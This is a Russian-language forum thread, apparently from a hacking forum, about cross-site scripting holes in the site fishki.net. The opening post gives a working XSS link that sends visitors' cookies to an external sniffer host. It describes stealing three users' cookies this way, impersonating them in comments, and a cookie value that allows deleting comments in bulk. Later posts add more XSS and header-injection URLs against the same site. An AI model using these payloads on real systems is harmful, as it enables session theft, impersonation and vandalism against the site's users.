Пассивная XSS в поиске на популярном сайте _www.fishki.net: если человек пройдет по ссылке _http://fishki.net/poisk.php?poisk=%27%3E%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Fantichat.ru%2Fcgi-bin%2Fs.jpg%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E То оставит свои куки на сниффере. После подмены, можно писать комментарии под его ником. Больше никаких функций не будет по-моему. Поэтому ксс относительно бесполезная. Тема на форуме: "Глюк на фишки нет" с этой ссылкой пролежала 5 минут и принесла 3 куков.
Обнаружил, что можно удалять комментарии, если вставить в куки че-нить дельное. Например ed36464a5c3b8f90fcd5d950a66197f4. Можно например написать скрипт, который будет лазить по топискам и тереть все комментарии, кроме нужных (реклама например)... Если кто-нить будет реализовывать, накиньте денег на пивко...
Вот еще: http://www.fishki.net/gresult.php?pollid='><script>alert('XSS')%3B</script>&voteid=1 ; http://www.fishki.net/comment.php?id='><script>alert('XSS')%3B</script> ; http://www.fishki.net/rgolos.php?pollid='><script>alert('XSS')%3B</script> ; http://www.fishki.net/gresult.php?pollid='><script>alert('XSS');</script> и еще установка своих cookies - http://www.fishki.net/votecomsend.php?pollid=some_url Set-Cookie:this_header=injected
хотел бы выразить благодарность за создание этой темы и отдельно ресурсу античат. podkashey, как мы с тобой уже договорились - на пиво я тебе дам за проделанную работу, кинь мне в пм wmz, на этой неделе постараюсь перевести. Go0o$E, тебе тоже большое спасибо за найденные уязвимости, кинь также в пм свой wmz, постараюсь не обидеть. как получите wmz, отпишитесь в этой теме, пожалуйста, чтоб не думали, что я обманул. Спасибо.
censored!, да. не с самого начала, двиг начат не мной, там внизу подписано чей From m0nzt3r: сорри не удержался, просто твой проект нравится мне.Так держать!
http://xshop.fishki.net/my/orders/get_by_code.php?code=<script>alert(/xss_by_toxa/);alert(document.cookie)</script>&check=
+toxa+, это http://www.sexvideogid.ru/ - их партнёрка. я там не при чём если хочешь - могу им передать. скажешь нет - промолчу
